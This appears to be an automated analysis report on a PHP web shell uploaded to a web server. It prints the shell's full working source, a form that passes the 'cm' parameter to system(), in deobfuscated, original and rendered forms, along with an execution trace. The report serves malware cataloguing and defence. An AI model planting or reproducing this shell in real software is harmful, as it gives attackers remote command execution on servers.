PHP Malware Analysis
00000000ax.php
md5: 38b2b58a89e7ce8a7f4c6938003a75ac
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- system (Deobfuscated, HTML, Original)
Input
- _GET (Deobfuscated, HTML, Original)
Title
- Document (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form method="get">
<input type="text" name="cm">
<button type="submit">Submit</button>
</form>
<?php
if (isset($_GET['cm'])) {
system($_GET['cm']);
}
?>
</body>
</html>Execution traces
data/traces/38b2b58a89e7ce8a7f4c6938003a75ac_trace-1676240192.272.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:16:58.169866]
1 0 1 0.000148 393528
1 3 0 0.000190 393696 {main} 1 /var/www/html/uploads/00000000ax.php 0 0
1 3 1 0.000207 393696
0.000233 314240
TRACE END [2023-02-12 20:16:58.169982]
Generated HTML code
<html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form method="get">
<input type="text" name="cm">
<button type="submit">Submit</button>
</form>
<!--?
if (isset($_GET['cm'])) {
system($_GET['cm']);
}
?-->
</body></html>Original PHP code
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form method="get">
<input type="text" name="cm">
<button type="submit">Submit</button>
</form>
<?
if (isset($_GET['cm'])) {
system($_GET['cm']);
}
?>
</body>
</html>